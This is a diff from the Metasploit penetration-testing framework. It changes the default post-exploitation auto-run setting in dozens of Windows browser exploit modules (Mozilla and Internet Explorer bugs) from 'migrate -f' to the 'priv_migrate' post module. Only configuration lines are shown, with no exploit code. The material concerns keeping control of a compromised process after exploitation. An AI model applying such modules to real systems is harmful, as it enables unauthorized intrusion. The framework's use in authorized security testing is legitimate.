'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/mozilla_interleaved_write.rb
View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/mozilla_mchannel.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/mozilla_nssvgvalue.rb
View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/mozilla_nstreerange.rb
View File

@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread', # graceful exit if run in separate thread
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/mozilla_reduceright.rb
View File

@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms05_054_onload.rb
View File

@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms09_002_memory_corruption.rb
View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
View File

@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms10_002_ie_object.rb
View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
View File

@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
View File

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
View File

@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => %w{ win },
'Targets' =>

2
modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
View File

@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms11_003_ie_css_import.rb
View File

@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
View File

@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms11_081_option.rb
View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms11_093_ole32.rb
View File

@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms12_004_midi.rb
View File

@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms12_037_ie_colspan.rb
View File

@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/ms12_037_same_id.rb
View File

@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
View File

@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
View File

@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'EXITFUNC' => 'thread'
},
'Platform' => 'win',

2
modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
View File

@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Arch' => ARCH_X86,

2
modules/exploits/windows/browser/ms13_055_canchor.rb
View File

@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
# Bug was patched in July 2013. Tsai was the first to publish the bug.

2
modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
View File

@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
'DisclosureDate' => "Jun 27 2013",

2
modules/exploits/windows/browser/ms13_069_caret.rb
View File

@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
'DisclosureDate' => "Sep 10 2013",

2
modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
View File

@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
#'PrependMigrate' => true,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
# Jsunpack first received a sample to analyze on Sep 12 2013.

2
modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
View File

@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'Retries' => false
},
'Privileged' => false,

Some files were not shown because too many files have changed in this diff Show More